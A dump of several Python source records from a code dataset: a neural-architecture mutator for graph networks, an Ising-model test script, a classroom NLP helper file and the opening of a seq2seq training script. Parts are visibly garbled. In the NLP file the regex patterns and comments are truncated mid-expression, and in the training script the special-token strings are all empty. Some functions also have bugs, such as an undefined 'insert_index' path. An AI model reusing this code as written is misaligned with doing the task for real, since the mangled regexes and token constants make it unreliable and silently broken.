arch_list[1:insert_index]\n same_weights[insert_index+2:len(arch_list)] = arch_list[insert_index+2:len(arch_list)]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n \n command_string = ' '.join(cmd_split)\n \n return old_string,command_string, success_flag, insert_index\n \n else:\n \n print (\"Cannot Add Skip Connection due to no convolutions.\")\n success_flag = 0\n insert_index = 0\n \n return old_string,old_string, success_flag, insert_index\n\n ###########################################################################################\n # This function adds a one-to-one (batchnorm and relu) identity function. #\n # #\n ###########################################################################################\n def add_one_to_one(self, old_string): \n print(\"Add one-to-one layer\")\n reset_weights = []\n same_weights = []\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n c_idx=get_layer_indices(arch_list,'c')\n \n if (len(fc_idx)>0) and (len(c_idx)>0):\n insert_index = np.random.randint(1,np.max(c_idx)+1)\n else:\n insert_index = 1\n\n coo_filters = np.random.choice([4,8,16,32,64,128,256,512])\n coo_layer = make_layer_string('coo',coo_filters)\n arch_list.insert(insert_index,coo_layer)\n reset_weights = arch_list[insert_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n \n command_string = ' '.join(cmd_split)\n print (\"Adding One-by-One layer at \" + str(insert_index))\n success_flag = 1\n \n return old_string,command_string, success_flag, insert_index\n \n ###########################################################################################\n # This function removes one-by-one layer #\n # #\n ########################################################################################### \n\n def remove_one_to_one(self, old_string):\n print(\"Removing one-by-one layer\")\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n coo_idx = get_layer_indices(arch_list,'coo')\n\n if len(coo_idx)>0:\t\n remove_index = np.random.choice(coo_idx)\n print (\"Removing one-by-one layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No one-by-one Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n ###########################################################################################\n # This function adds an attention layer #\n # #\n ###########################################################################################\n def add_attention_layer(self, old_string): \n print(\"Add attention layer\")\n reset_weights = []\n same_weights = []\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n c_idx = get_layer_indices(arch_list,'c')\n \n if (len(fc_idx)>0) and (len(c_idx)>0):\n insert_index = np.random.randint(1,np.max(c_idx)+1)\n else:\n insert_index = 1\n\n a_filters = np.random.choice([4,8,16,32,64,128,256,512])\n a_layer = make_layer_string('a1d',a_filters) \n arch_list.insert(insert_index,a_layer)\n reset_weights = arch_list[insert_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n \n command_string = ' '.join(cmd_split)\n print (\"Adding Attention layer at \" + str(insert_index))\n success_flag = 1\n \n return old_string,command_string, success_flag, insert_index\n \n ###########################################################################################\n # This function removes attention layer #\n # #\n ########################################################################################### \n\n def remove_attention(self, old_string):\n print(\"Removing attention layer\")\n\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n a1d_idx = get_layer_indices(arch_list,'a1d')\n\n if len(a1d_idx)>0:\t\n remove_index = np.random.choice(a1d_idx)\n print (\"Removing attention layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No attention Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n\n\n def add_edgeconv_layer(self, old_string): \n print(\"Adding Edge Conv layer\")\n #f_size = [128,256,512]\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list, 'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n \n if len(fc_idx)>0:\n insert_index = np.random.choice(range(1,fc_idx[0]+1))\n else:\n insert_ix = 1\n print (\"Index chosen is \" + str(insert_index))\n \n layer_string = arch_list[insert_index].split('_')\n edgeconv_filters = np.random.choice([4,8,16,32,64,128,256,512])\n \n edgeconv_layer= make_layer_string('ec', edgeconv_filters) \n arch_list.insert(insert_index,edgeconv_layer)\n \n same_weights = []\n reset_weights = arch_list[insert_index]\n same_weights[1:insert_index] = arch_list[1:insert_index]\n same_weights[insert_index+1:len(same_weights)]=arch_list[insert_index+1:len(arch_list)]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n\n return old_string,command_string,success_flag,insert_index\n \n ###########################################################################################\n # This function removes attention layer #\n # #\n ########################################################################################### \n\n def remove_edgeconv(self, old_string):\n print(\"Removing Edge Conv layer\")\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n ec_idx = get_layer_indices(arch_list,'ec')\n\n if len(ec_idx)>0:\t\n remove_index = np.random.choice(ec_idx)\n print (\"Removing edge conv layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No Edge Conv Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n\n \n \n def replace_mutation(self, old_string):\n \n print(\"Replace Mutation\")\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n c_idx = get_layer_indices(arch_list,'c')\n ec_idx = get_layer_indices(arch_list,'ec')\n coo_idx = get_layer_indices(arch_list,'coo')\n filter_list = [4,8,16,32,64,128,256,512]\n replace_flag = 0\n \n if (len(c_idx)>0) or (len(ec_idx)>0) or (len(coo_idx)>0): \n while not replace_flag:\n type = np.random.choice(['c','ec','coo'])\n if (type == 'c') and len(c_idx)>0 :\n replace_flag = 1\n elif (type == 'ec') and len(ec_idx)>0 :\n replace_flag = 1\n elif (type == 'coo') and len(coo_idx)>0 :\n replace_flag = 1\n else:\n replace_flag = 0\n \n if (type == 'c') :\n arch_list, replace_index = replace_filter(arch_list, c_idx ,filter_list)\n print (\"Replacing Convolution layer at \" + str(replace_index))\n elif (type == 'ec') :\n arch_list, replace_index = replace_filter(arch_list, ec_idx ,filter_list)\n print (\"Replacing Edge Convolution layer at \" + str(replace_index))\n elif (type == 'coo') :\n arch_list, replace_index = replace_filter(arch_list, coo_idx ,filter_list)\n print (\"Replacing One-by-One Convolution layer at \" + str(replace_index))\n \n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n \n else:\n print(\"No type of Convolutions present for replacement\")\n command_string = old_string\n success_flag = 0\n replace_index = 0\n \n return old_string,command_string,success_flag, replace_index\n\n\ndef get_mutation(path, mutation_choice):\n \n Mutator_test = Mutator(path)\n options = defaultdict(lambda: 'defalut', {0:Mutator.learning_rate_mutation,1:Mutator.add_fc, \\\n 2:Mutator.remove_fc , 3:Mutator.add_conv_layer, 4:Mutator.remove_conv,\\\n 5:Mutator.add_skip, 6:Mutator.remove_skip, 7:Mutator.add_edgeconv_layer, 8:Mutator.remove_edgeconv,9:Mutator.add_one_to_one,\\\n 10:Mutator.remove_one_to_one ,11: Mutator.add_attention_layer,12:Mutator.remove_attention, 13:Mutator.regularization_mutation, \\\n 14:Mutator.replace_mutation,15:Mutator.pool_mutation, 16: Mutator.pool_gep_mutation} )\n\n \n old_string,final_string,success_flag,index = options[mutation_choice](Mutator_test,path)\n \n return old_string,final_string, success_flag, index\n\ndef test_mutation(path, dataset):\n \n # Test mutation sequence\n mutation_sequence = [6,6, 20, 18,16,18,18,7,7,11,11,18,20,12,12,12,12,12]\n Mutator_test = Mutator(path)\n \n options = defaultdict(lambda: 'defalut', {0:Mutator.n_directions, 1:Mutator.n_neighbours,2:Mutator.agg_augment, 3:Mutator.learning_rate_mutation,\\\n 4:Mutator.identity_mutation,5:Mutator.filter_size_mutation, 6: Mutator.add_fc, 7:Mutator.add_conv_layer,\\\n 8:Mutator.remove_skip, 9:Mutator.add_skip, 10: Mutator.remove_conv, 11:Mutator.add_one_to_one,\\\n 12:Mutator.pool_mutation, 13:Mutator.add_attention_layer, 14:Mutator.remove_one_to_one, 15:Mutator.remove_attention ,\\\n 16: Mutator.pool_gep_mutation, 17:Mutator.regularization_mutation, 18:Mutator.add_edgeconv_layer, 19:Mutator.remove_edgeconv, 20:Mutator.replace_mutation} ) \n \n acc_list = []\n for mut_idx,choice in enumerate(mutation_sequence):\n pdb.set_trace()\n path = path + ' --trial_name mut'+ str(mut_idx)\n old_string,final_string,success_flag,index = options[choice](Mutator_test,path)\n print(final_string)\n old_split = old_string.split(' ')\n final_split = final_string.split(' ')\n\n if success_flag:\n acc = 0\n std = 0\n \n acc_list.append((acc,std))\n new_path = final_string.split(' ')\n del new_path[new_path.index('--trial_name')+1]\n del new_path[new_path.index('--trial_name')]\n new_path = ' '.join(new_path)\n path = new_path\n \n return acc_list, final_string\n\ndef get_args():\n \n parser = argparse.ArgumentParser(description='Process input architecture')\n parser.add_argument('--cycles', default='10', help='Specifies the total mutation cycles to undergo in current experiment.')\n parser.add_argument('--num_models', default= 5, type=int, help='Specifies the total number of models to be generated for current experiment.')\n parser.add_argument('--dataset_name', default='ENZYMES', help='Specifies the dataset for current experiment.')\n parser.add_argument('--log_path', default= './logs/', help='Specifies the file path to write individual cycle logs.' )\n parser.add_argument('--result_path', default= './results/', help='Specifies the file path to write final results of experiment.' )\n parser.add_argument('--load_lastcycle',default=1, type=int, help='Start experiment from last cycle.')\n parser.add_argument('--folds',default=10, type=int, help='Number of folds of Cross-validation.')\n parser.add_argument('--prob_cycle',default=1, type=int, help='Cycle at which mutation probability is changed.')\n \n \n parser.add_argument('--arch', default='OC,c_16_1_1,c_16_1_1,c_16_1_1,c_16_1_1,p_16,fc_10_0_0_0', help='Defines the model')\n parser.add_argument('--date', default='Sept02', help='Data run model')\n\n parser.add_argument('--train_flag', default=1, type=int,help='training flag')\n parser.add_argument('--debug_flag', default=0, type=int,help='debugging flag, if set as true will not save anything to summary writer')\n parser.add_argument('--num_iter', default=10, type=int,help='Number of iterations')\n parser.add_argument('--num_classes', default=10, type=int,help='Number of classes')\n\n parser.add_argument('--train_batch_size', default=60, type=int,help='Batch size for training')\n parser.add_argument('--test_batch_size', default=50, type=int,help='Batch size for testing')\n parser.add_argument('--snapshot_iter', default=200, type=int,help='Take snapshot each number of iterations')\n parser.add_argument('--starter_learning_rate', default=0.01, type=float,help='Started learning rate')\n parser.add_argument('--learning_rate_step', default=1000, type=int,help='Learning rate step decay')\n parser.add_argument('--learning_rate_exp', default=0.1, type=float,help='Learning rate exponential')\n parser.add_argument('--optimizer', default='adam', help='Choose optimizer type')\n parser.add_argument('--iterations_per_test', default=4000, type=int,help='Test model by validation set each number of iterations')\n parser.add_argument('--display_iter', default=5, type=int,help='Display training info each number of iterations')\n parser.add_argument('--l2',default=0.0,type=float,help=\"L2 Regularization parameter\")\n parser.add_argument('--l1',default=0.0,type=float,help=\"L1 Regularization parameter\")\n parser.add_argument('--pool_ratios',default='1.0_1.0_1.0',help=\"Ratio of vertex reductions for each pooling\")\n parser.add_argument('--separate_batches_flag', default=0, type=int,help='Separate samples to mini batches for protein dataset')\n parser.add_argument('--cluster_alg',default='Lloyd',help='How should pooling cluster vertices?')\n parser.add_argument('--group_name',default='WACV2018',help='Experiment Directory Name')\n parser.add_argument('--trial_name',default='G3DNet18',help='Experiment Directory Name')\n parser.add_argument('--sparse',type=int,default=0,help='Use Sparse Tensors')\n\n\n args = parser.parse_args()\n \n return args, parser\n \ndef main():\n \n command_string = 'src/run_protein_test.py --dataset_name ENZYMES --num_iter 10 --num_classes 6'\n cmd_split = command_string.split(' ')\n \n args, parser = get_args()\n args_list =cmd_split[1:]\n new_args = parser.parse_args(args= args_list)\n \n acc_list, final_string = test_mutation(command_string, dataset)\n print(acc_list)\n print(final_string)\n \nif __name__ == \"__main__\":\n main()\n \n","sub_path":"GraphMutator.py","file_name":"GraphMutator.py","file_ext":"py","file_size_in_byte":47917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"105360123","text":"import rbm_pytorch\nimport ising_methods\nimport numpy as np\n\ntraining_data = \"../../state02.27.txt\"\ndata = np.loadtxt(training_data, delimiter=\",\",skiprows=1, dtype=\"float32\")\n\ntemp = 2.27\nN = 64\nlength = 8\n\nnewshape = data.reshape(-1, length**2)\n\nprint(newshape[0])\n\n\n\nstates = []\n\nfor x in range(len(newshape)):\n\tstates.append(ising_methods.IsingState(newshape[x], length))\n\nprint(ising_methods.susceptibility(states, temp,N))\nprint(ising_methods.heat_capacity(states,temp,N))\n","sub_path":"ising_method_test.py","file_name":"ising_method_test.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"208297540","text":"\"\"\"\nThis is a document containing all of the functions\nneeded to make the 'text' class. \n\"\"\"\n\n\"\"\"\nThis script contain an example Text class\n\nEach function contains:\nAn explanation as well as an example\nYour job as a studygroup is to make the functions in class 2 and 3.\n\nIn class 3 we will then assemble a pipeline using the Text class at the end.\n\n\nI suggest you start from the top and for each function:\n 1) discuss potential solution (e.g. sentence segmentation splitting by \".\")\n 2) implement the simplest solution first for each function\n 3) go back and improve upon the initial function\n\nfor class 2 it would be ideal if you have a simple version of the following\nfunctions:\n sentence_segment\n tokenize\n n_grams\n ner_regex\n\nAdditional stuff which you might add is:\n A function for dependency parsing using stanza\n alternatives to each of the function (e.g. using tokenization using nltk)\n Add a function for stemming\n Add plotting functionality for word frequencies\n Add plotting functionality for dependency trees\n\"\"\"\n\n\n# string to test on:\ntxt = \"\"\"These are several sentences. They will be splittet a lot. It is inevitable. \nIt will happen although J.D. Gould would like it to be otherwise, or se he says.\nThis sentence tests (or intends to) test parenthes\nand exclamations! At least that was the plan.\nAnother thing one might do is the following: testing this.\nAbbreviations like are tricky. Does this come to mind?\nI thought so. The little Martin Jr. thought it was good.\"\"\"\n\n## sentence segmentation:\ndef sentence_segment(txt):\n \"\"\"\n txt (str): Text which you want to be segmented into\n sentences.\n\n Example:\n >>> txt = \"NLP is very cool. It is also useful\"\n >>> sentence_segment(txt)\n [\"NLP is very cool\", \"It is also useful\"]\n \"\"\"\n\n # importing the module re:\n import re\n\n p1 = \"(? trying to match.\n # \\s (also matching to delete). Whitespace\n # (? still lacking Mrs. Smith (to do).\n # newline?\n\n # https://regex101.com/r/nG1gU7/27 (inspiration).\n\n # use our regex:\n splittet = [w.replace(\"\\n\", \"\") for w in re.split(p1, txt)]\n splittet = [re.sub(\"\\n|\\.|\\(|\\)|,\", \"\", w) for w in re.split(p1, txt)]\n\n # has to be done to accommodate the pipeline:\n # list of lists instead of list..\n sentences = [[sent] for sent in splittet if sent != \"\"]\n return sentences\n\n\n\"\"\" Issues: getting the last dot \"\"\"\n\n# testing:\nsentence_seg = sentence_segment(txt)\nprint(sentence_seg)\n\n## tokenization\n## using nltk?\ndef tokenize(sentences):\n \"\"\"\n sentences (list): Sentences which you want to be tokenized\n\n Example:\n >>> sent = [\"NLP is very cool\"]\n >>> tokenize(sent)\n [[\"NLP\", \"is\", \"very\", \"cool\"], [\"It\", \"is\", \"also\", \"useful\"]]\n \"\"\"\n ## importing re:\n import re\n\n ## unlist (fixing issues):\n sentences_flat = [word for w in sentences for word in w]\n\n ## Split these: (keep words like J. D. Gould together)?\n ## More work required here..?\n output = [re.split(\"\\W\", b) for b in sentences_flat]\n\n ## This\n return output\n\n\n# testing:\nsentence_tok = tokenize(sentence_seg)\nprint(sentence_tok)\n\n## n-grams (for unnested list):\n\n## recursion:\ndef n_grams(tokenlist, n):\n \"\"\"\n tokenlist (list): A list of tokens\n n (int): Indicate the n in n-gram. n=2 denotes bigrams\n\n creates n-grams from a given tokenlist\n\n Example:\n >>> tokens = [\"NLP\", \"is\", \"very\", \"cool\"]\n >>> n_grams(tokens, n=2)\n [[\"NLP\", \"is\"], [\"is\", \"very\"], [\"very\", \"cool\"]]\n \"\"\"\n\n # initialization:\n master_list = [] # empty list:\n sub_list = [] # empty list\n\n # for loop: (list comprehension?)\n for i in range(\n len(tokenlist) - (n - 1)\n ): # loop through is dependent on n-1 (what gram we do)\n for j in range(n): # how many things we will append\n sub_list.append(tokenlist[i + j]) # append to sub list.\n master_list.append(sub_list) # append sub list to master list.\n sub_list = [] # clear the sub-list.\n\n # return:\n return master_list\n\n\n## n-grams for nested list:\ndef n_grams2(tokenlist, n):\n \"\"\"\n tokenlist (list): A list of tokens\n n (int): Indicate the n in n-gram. n=2 denotes bigrams\n\n creates n-grams from a given tokenlist\n\n Example:\n >>> tokens = [\"NLP\", \"is\", \"very\", \"cool\"]\n >>> n_grams(tokens, n=2)\n [[\"NLP\", \"is\"], [\"is\", \"very\"], [\"very\", \"cool\"]]\n \"\"\"\n\n # initialization:\n lst_complete = [] # empty list.\n lst_sentence = [] # empty list.\n lst_word = [] # empty list.\n\n for i in range(len(tokenlist)): # sentences:\n for j in range(len(tokenlist[i]) - (n - 1)):\n for k in range(n):\n lst_word.append(tokenlist[i][j + k]) # append to word list.\n lst_sentence.append(lst_word) # append to sentence list.\n lst_word = [] # clear word list.\n lst_complete.append(lst_sentence)\n lst_sentence = [] # clear sentence list.\n\n # return:\n return lst_complete\n\n\n## Named entity recognition:\n# Obviously this cannot distinguish anything\n# Starting a sentence (e.g., \"I am\" from \"Michelle is\").\n# So, it is very insufficient.\ndef ner_regex(tokenlist):\n \"\"\"\n tokenlist (list): A list of tokens\n\n peforms named entity recognition using regular expressions\n Example:\n >>> sent = [[\"Karl Friston is very cool\"], [\"Darwin is kick-ass\"]]\n >>> ner_regex(sent)\n [[\"Karl Friston\"], [\"Darwin\"]]\n \"\"\"\n\n # import re:\n import re\n\n # capture group and non-capture groups:\n pattern = re.compile(r\"(?>> tokens = [[\"NLP\", \"is\", \"very\", \"cool\"],\n [\"It\", \"is\", \"also\", \"useful\"]]\n >>> token_frequencies(sent)\n {\"NLP\": 1, \"is\": 2, \"very\": 1, \"cool\": 1, \"It\": 1, \"also\": 1, \"useful\": 1}\n \"\"\"\n # import Counter\n from collections import Counter\n\n # initialize our counter/dictionary:\n token_frq = Counter()\n\n # unlist (we don't care about which sentence for now):\n # this probably only works for \"once\" nested..\n tokens_list = [item for sublist in tokenlist for item in sublist]\n\n # https://docs.python.org/2/library/collections.html\n for word in tokens_list:\n token_frq[word] += 1\n\n return token_frq\n\n\n## Lemmatize using stanza (redundant now)\ndef lemmatize_stanza(tokenlist, return_df=False):\n \"\"\"\n tokenlist (list): A list of tokens\n\n lemmatize a tokenlist using stanza\n \"\"\"\n\n import stanza\n\n nlp = stanza.Pipeline(\n lang=\"en\", processors=\"tokenize,lemma\", tokenize_pretokenized=True\n )\n doc = nlp(tokenlist)\n\n res = [\n (word.lemma) for n_sent, sent in enumerate(doc.sentences) for word in sent.words\n ]\n\n if return_df:\n import pandas as pd\n\n return pd.DataFrame(res)\n return res\n\n\n## POS-tag using stanza (redundant now):\n\n\ndef postag_stanza(tokenlist, return_df=False):\n \"\"\"\n tokenlist (list): A list of tokens\n\n add a part-of-speech (POS) tag to each tokenlist using stanza\n \"\"\"\n\n import stanza\n\n nlp = stanza.Pipeline(\n lang=\"en\", processors=\"tokenize,lemma,mwt,pos\", tokenize_pretokenized=True\n )\n\n doc = nlp(tokenlist)\n\n res = [\n (word.lemma, word.pos)\n for n_sent, sent in enumerate(doc.sentences) # n_sent sentence number?\n for word in sent.words\n ]\n\n if return_df:\n import pandas as pd\n\n return pd.DataFrame(res)\n return res\n\n\n### new super-function which returns everything ###\n\n## trouble-shooting:\nprint(sentence_reg)\n\nlst = []\nfor n, sentence in enumerate(sentence_reg):\n print(n + 1)\n print(sentence)\n if sentence == []:\n placeholder = (n + 1, \"None\", False)\n lst.append(placeholder)\n if sentence != []:\n for i in sentence:\n placeholder = (n + 1, i, True)\n lst.append(placeholder)\n placeholder = None\n\n\"\"\"\n\nimport pandas as pd\n\ntestFrame = pd.DataFrame(lst, columns=[\"sentence num\", \"token\", \"ner\"])\n\ntestFrame\n\n#\nners_clean = [(n_sentence + 1, sent) for n_sentence, sent in enumerate(sentence_reg)]\nners_clean\n\"\"\"\n\n\ndef stanza_panda(segmented, tokenlist, return_df=True):\n \"\"\"\n write doc-string.\n \"\"\"\n\n import stanza\n\n ## stanza stuff ##\n nlp = stanza.Pipeline(\n lang=\"en\", processors=\"tokenize, mwt, pos, lemma\", tokenize_pretokenized=True\n )\n\n doc = nlp(tokenlist)\n\n ## obtained:\n # n_sent: sentence number\n # sent: token\n # word.lemma: lemma\n # word.pos: POS-tag\n # lacking (ner)..\n\n res = [\n (n_sentence + 1, word.id, word.text, word.lemma, word.pos)\n for n_sentence, sent in enumerate(doc.sentences) # n_sent sentence number?\n for word in sent.words\n ]\n\n # NER on sentences:\n # ners = ner_regex(segmented)\n # ners_clean = [(n_sentence + 1,) for n_sentence, sent in enumerate(ners)]\n\n ## return pandas dataframe ##\n if return_df:\n import pandas as pd\n\n return pd.DataFrame(\n res, columns=[\"sentence num\", \"word num\", \"token\", \"lemma\", \"pos\"]\n )\n return res\n\n\n\"\"\"\n# testing:\nprint(sentence_tok)\nstanza_test = stanza_panda(sentence_seg, sentence_tok, True)\nstanza_test\ntestFrame\n\n## combining (based on order - does not work)\ncombined = pd.concat([stanza_test, testFrame], axis=1, join=\"inner\")\ncombined\n\n## merge left?\nmerged_left = pd.merge(left=stanza_test, right=testFrame, how='left', left_on='species_id', right_on='species_id')\ncombined = pd.DataFrame.merge([stanza_test, testFrame])\ncombined\n\"\"\"\n","sub_path":"classroom_materials/class_02/functions_VMP.py","file_name":"functions_VMP.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"270047581","text":"from __future__ import division\nimport argparse\nimport logging\nimport math\nimport os\nimport random\nimport re\nimport time\nfrom collections import Counter\nimport numpy as np\nimport scipy.stats as st\nimport torch\nimport torch.nn as nn\nfrom nltk.stem.porter import PorterStemmer\nfrom torch import cuda\nfrom torch.autograd import Variable\nfrom torch.nn.utils.rnn import pack_padded_sequence as pack\nfrom torch.nn.utils.rnn import pad_packed_sequence as unpack\nimport torch.optim as optim\nfrom torch.nn.utils import clip_grad_norm\nfrom torch.optim.optimizer import Optimizer\n\ntry:\n import ipdb\nexcept ImportError:\n pass\nstemmer = PorterStemmer()\n\nPAD = 0\nUNK = 1\nBOS = 2\nEOS = 3\n\nPAD_WORD = ''\nUNK_WORD = ''\nBOS_WORD = ''\nEOS_WORD = ''\n\nlower = True\nseq_length = 100\nreport_every = 100000\nshuffle = 1\n\nlogger = logging.getLogger(__name__)\n\n\ndef add_data_options(parser):\n ## Data options\n parser.add_argument('-save_path', default='./results',\n help=\"\"\"Model filename (the model will be saved as\n _epochN_PPL.pt where PPL is the\n validation perplexity\"\"\")\n\n # tmp solution for load issue\n parser.add_argument('-online_process_data', action=\"store_true\")\n parser.add_argument('-process_shuffle', action=\"store_true\")\n parser.add_argument('-train_src', default='')\n parser.add_argument('-src_vocab', default='')\n parser.add_argument('-train_tgt', default='')\n parser.add_argument('-tgt_vocab', default='')\n\n # Test options\n parser.add_argument('-dev_input_src',\n help='Path to the dev input file.')\n parser.add_argument('-dev_ref',\n help='Path to the dev reference file.')\n parser.add_argument('-beam_size', type=int, default=12,\n help='Beam size')\n parser.add_argument('-max_sent_length', type=int, default=100,\n help='Maximum sentence length.')\n\n\ndef add_model_options(parser):\n ## Model options\n parser.add_argument('-layers', type=int, default=1,\n help='Number of layers in the LSTM encoder/decoder')\n parser.add_argument('-enc_rnn_size', type=int, default=512,\n help='Size of LSTM hidden states')\n parser.add_argument('-dec_rnn_size', type=int, default=512,\n help='Size of LSTM hidden states')\n parser.add_argument('-word_vec_size', type=int, default=300,\n help='Word embedding sizes')\n parser.add_argument('-att_vec_size', type=int, default=512,\n help='Concat attention vector sizes')\n parser.add_argument('-maxout_pool_size', type=int, default=2,\n help='Pooling size for MaxOut layer.')\n parser.add_argument('-input_feed', type=int, default=1,\n help=\"\"\"Feed the context vector at each time step as\n additional input (via concatenation with the word\n embeddings) to the decoder.\"\"\")\n # parser.add_argument('-residual', action=\"store_true\",\n # help=\"Add residual connections between RNN layers.\")\n parser.add_argument('-brnn', action='store_true',\n help='Use a bidirectional encoder')\n parser.add_argument('-brnn_merge', default='concat',\n help=\"\"\"Merge action for the bidirectional hidden states:\n [concat|sum]\"\"\")\n\n\ndef add_train_options(parser):\n ## Optimization options\n parser.add_argument('-batch_size', type=int, default=64,\n help='Maximum batch size')\n parser.add_argument('-max_generator_batches', type=int, default=32,\n help=\"\"\"Maximum batches of words in a sequence to run\n the generator on in parallel. Higher is faster, but uses\n more memory.\"\"\")\n parser.add_argument('-epochs', type=int, default=13,\n help='Number of training epochs')\n parser.add_argument('-start_epoch', type=int, default=1,\n help='The epoch from which to start')\n parser.add_argument('-param_init', type=float, default=0.1,\n help=\"\"\"Parameters are initialized over uniform distribution\n with support (-param_init, param_init)\"\"\")\n parser.add_argument('-optim', default='sgd',\n help=\"Optimization method. [sgd|adagrad|adadelta|adam]\")\n parser.add_argument('-max_grad_norm', type=float, default=5,\n help=\"\"\"If the norm of the gradient vector exceeds this,\n renormalize it to have the norm equal to max_grad_norm\"\"\")\n parser.add_argument('-max_weight_value', type=float, default=15,\n help=\"\"\"If the norm of the gradient vector exceeds this,\n renormalize it to have the norm equal to max_grad_norm\"\"\")\n parser.add_argument('-dropout', type=float, default=0.3,\n help='Dropout probability; applied between LSTM stacks.')\n parser.add_argument('-curriculum', type=int, default=1,\n help=\"\"\"For this many epochs, order the minibatches based\n on source sequence length. Sometimes setting this to 1 will\n increase convergence speed.\"\"\")\n parser.add_argument('-extra_shuffle', action=\"store_true\",\n help=\"\"\"By default only shuffle mini-batch order; when true,\n shuffle and re-assign mini-batches\"\"\")\n\n # learning rate\n parser.add_argument('-learning_rate', type=float, default=1.0,\n help=\"\"\"Starting learning rate. If adagrad/adadelta/adam is\n used, then this is the global learning rate. Recommended\n settings: sgd = 1, adagrad = 0.1, adadelta = 1, adam = 0.001\"\"\")\n parser.add_argument('-learning_rate_decay', type=float, default=0.5,\n help=\"\"\"If update_learning_rate, decay learning rate by\n this much if (i) perplexity does not decrease on the\n validation set or (ii) epoch has gone past\n start_decay_at\"\"\")\n parser.add_argument('-start_decay_at', type=int, default=8,\n help=\"\"\"Start decaying every epoch after and including this\n epoch\"\"\")\n parser.add_argument('-start_eval_batch', type=int, default=15000,\n help=\"\"\"evaluate on dev per x batches.\"\"\")\n parser.add_argument('-eval_per_batch', type=int, default=1000,\n help=\"\"\"evaluate on dev per x batches.\"\"\")\n parser.add_argument('-halve_lr_bad_count', type=int, default=6,\n help=\"\"\"evaluate on dev per x batches.\"\"\")\n\n # pretrained word vectors\n parser.add_argument('-pre_word_vecs_enc',\n help=\"\"\"If a valid path is specified, then this will load\n pretrained word embeddings on the encoder side.\n See README for specific formatting instructions.\"\"\")\n parser.add_argument('-pre_word_vecs_dec',\n help=\"\"\"If a valid path is specified, then this will load\n pretrained word embeddings on the decoder side.\n See README for specific formatting instructions.\"\"\")\n\n # GPU\n parser.add_argument('-gpus', default=[], nargs='+', type=int,\n help=\"Use CUDA on the listed devices.\")\n\n parser.add_argument('-log_interval', type=int, default=100,\n help=\"logger.info stats at this interval.\")\n\n parser.add_argument('-seed', type=int, default=-1,\n help=\"\"\"Random seed used for the experiments\n reproducibility.\"\"\")\n parser.add_argument('-cuda_seed', type=int, default=-1,\n help=\"\"\"Random CUDA seed used for the experiments\n reproducibility.\"\"\")\n\n parser.add_argument('-log_home', default='',\n help=\"\"\"log home\"\"\")\n\n\nparser = argparse.ArgumentParser(description='train.py')\nadd_data_options(parser)\nadd_model_options(parser)\nadd_train_options(parser)\n\nopt = parser.parse_args()\nprint(opt)\n\nlogging.basicConfig(format='%(asctime)s [%(levelname)s:%(name)s]: %(message)s', level=logging.INFO)\n# Error DEBUG\nlog_file_name = time.strftime(\"%Y%m%d-%H%M%S\") + '.log.txt'\nif opt.log_home:\n log_file_name = os.path.join(opt.log_home, log_file_name)\nfile_handler = logging.FileHandler(log_file_name, encoding='utf-8')\nfile_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)-5.5s:%(name)s] %(message)s'))\nlogging.root.addHandler(file_handler)\n\nlogger.info('My PID is {0}'.format(os.getpid()))\nlogger.info(opt)\n\nif torch.cuda.is_available() and not opt.gpus:\n logger.info(\"WARNING: You have a CUDA device, so you should probably run with -gpus 0\")\n\nif opt.seed > 0:\n torch.manual_seed(opt.seed)\nopt.gpus = False\nif opt.gpus:\n if opt.cuda_seed > 0:\n torch.cuda.manual_seed(opt.cuda_seed)\n cuda.set_device(opt.gpus)\n\n\nclass Dict(object):\n def __init__(self, data=None, lower=False):\n self.idxToLabel = {}\n self.labelToIdx = {}\n self.frequencies = {}\n self.lower = lower\n\n # Special entries will not be pruned.\n 